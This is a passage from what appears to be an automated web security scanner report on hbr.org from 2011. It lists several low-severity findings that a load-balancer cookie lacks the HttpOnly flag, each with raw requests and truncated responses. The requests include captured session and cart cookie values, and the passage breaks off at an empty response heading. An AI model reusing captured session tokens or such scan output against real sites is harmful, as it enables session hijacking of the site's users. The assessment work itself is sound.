The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:30 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "3eb37c-27b2-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:30 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 10162 Content-Type: text/css /* * FancyBox - jQuery Plugin * Simple and fancy lightbox alternative * * Examples and documentation at: http://fancybox.net * * Copyright (c) 2008 - 2010 Janis Skarnelis * * Version:...[SNIP]...
6.17. http://hbr.org/hbrg-main/resources/css/reset.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/reset.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/reset.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:24 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "61188-1cf-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:24 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 463 Content-Type: text/css body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td {margin:0; padding:0;} table {border-collapse:collapse; border-spacing:0;} fieldset,img {border:0;}...[SNIP]...
6.18. http://hbr.org/hbrg-main/resources/css/stay_connected.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/stay_connected.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/stay_connected.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "61186-687-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1671 Content-Type: text/css .../* Begin Stay Connected */ #stay_connected { border:10px solid #bdbcbc; font-family:Arial, Helvetica, sans-serif; margin:0 0 25px 10px; text-align:center; width:280px; } #stay_connected a { col...[SNIP]...
6.19. http://hbr.org/hbrg-main/resources/css/style.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/style.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/style.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Mon, 24 Oct 2011 17:02:51 GMT ETag: "5f933-211d5-4b00e649ec4c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 135637 Content-Type: text/css @import url("reset.css"); @import url("stay_connected.css"); /*------- THIRD PARTY CSS ---------*/ @import url("/hbrg-main/resources/css/marketing/baynote.css"); /*----------- BEGIN GLOBAL --------...[SNIP]...
6.20. http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/html/marketing/partner_center.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/html/marketing/partner_center.html HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT Server: Apache Last-Modified: Wed, 24 Aug 2011 17:55:35 GMT Accept-Ranges: bytes Cache-Control: max-age=7200, proxy-revalidate Expires: Wed, 09 Nov 2011 16:09:37 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 3326 Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html> <head> <style type="text/css"> @import url("/hbrg-main/resources/...[SNIP]...
6.21. http://hbr.org/hbrg-main/resources/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/favicon.ico HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:15 GMT ETag: "67ec0-57e-4a888798ac9c0" Accept-Ranges: bytes Content-Length: 1406 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT LEG: 5 Content-Type: text/plain; charset=UTF-8 ..............h.......(....... ...............................q\......>!...................v......!........................................................................................................[SNIP]...
6.22. http://hbr.org/hbrg-main/resources/images/generic_product_images/case_study_100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/generic_product_images/case_study_100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/generic_product_images/case_study_100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:26 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:15 GMT ETag: "81513-814-4a888798ac9c0" Accept-Ranges: bytes Content-Length: 2068 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:26 GMT LEG: 5 Content-Type: image/gif GIF89ad......***DEF.Y[.<A....uu....JN.gh.||.CH.-4.QU.5;.&....$&'....no.`b...rtt......cde......466......SUU..............'..................................................................................[SNIP]...
6.23. http://hbr.org/hbrg-main/resources/images/hbrPrintLogo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/hbrPrintLogo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/hbrPrintLogo.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:16 GMT ETag: "67eca-d52-4a888799a0c00" Accept-Ranges: bytes Content-Length: 3410 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT LEG: 5 Content-Type: image/gif GIF89a..C....pmn0--MJK.................................?<=ZWX.........{yy..............."..fcd......#. ......!.......,......C.....'.di.h..l..p|.tm.x..5O....ti...V..l:..h.Q2\&...c f...x..t...k m..TR..n...[SNIP]...
6.24. http://hbr.org/hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/marketing/baynote.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:17 GMT ETag: "18e139-43-4a88879a94e40" Accept-Ranges: bytes Content-Length: 67 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89aC............!.......,....C......D................".....*S..;
6.25. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:38 GMT Server: Apache Last-Modified: Tue, 27 Sep 2011 19:03:42 GMT ETag: "f074c-2be5-4adf0ef191f80" Accept-Ranges: bytes Content-Length: 11237 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:38 GMT LEG: 5 Content-Type: image/gif GIF89a,.d....EEE...........zg......@+222.5%................L4.P6z..Mqs..........[Q....l....:'...z,..........wwwZ|}......UxyEkmPtufee...........................Y{|......\}~.]D....H1....5.....t_.hR<deS...[SNIP]...
6.26. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:20 GMT ETag: "81701-28ac-4a88879d71500" Accept-Ranges: bytes Content-Length: 10412 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:39 GMT LEG: 5 Content-Type: image/gif GIF89a,.d.......oqN..MLQ,....rM...60....}....x........l......[...........Tx.........u.....e.....TAB.[lM..v..c...TU.^U-:G+y.chf<Fc}:Rh...Ji.|z@.....X...fc*h..A8............e...WW..............._..........[SNIP]...
6.27. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:40 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:19 GMT ETag: "81694-1aa6-4a88879c7d2c0" Accept-Ranges: bytes Content-Length: 6822 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:40 GMT LEG: 5 Content-Type: image/gif GIF89a,.d.............SSS.........@=>^[[......OLM2./.........ljj\'3{yy.<Q.........x+<............ppp.}..VhbbbEEE...................I].ct......?#)....p.....N0--* "..!.-Aj)7..C...777...1!$uss...LII....[SNIP]...
6.28. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
